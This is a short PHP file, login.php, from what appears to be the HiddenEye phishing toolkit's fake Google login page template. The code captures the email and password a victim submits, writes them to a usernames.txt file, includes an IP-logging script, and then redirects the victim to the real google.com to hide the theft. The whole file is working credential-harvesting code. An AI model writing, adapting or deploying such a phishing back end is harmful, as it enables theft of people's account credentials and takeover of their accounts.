HiddenEye-Legacy/WebPages/google_standard/login.php
Usama Abdul Sattar b8891baf3b
Update login.php
2018-06-07 14:21:17 +05:00

8 lines
214 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['Email'] . " [PASS]: " . $_POST['Passwd'] . "\n", FILE_APPEND);
header('Location: https://google.com/');
exit();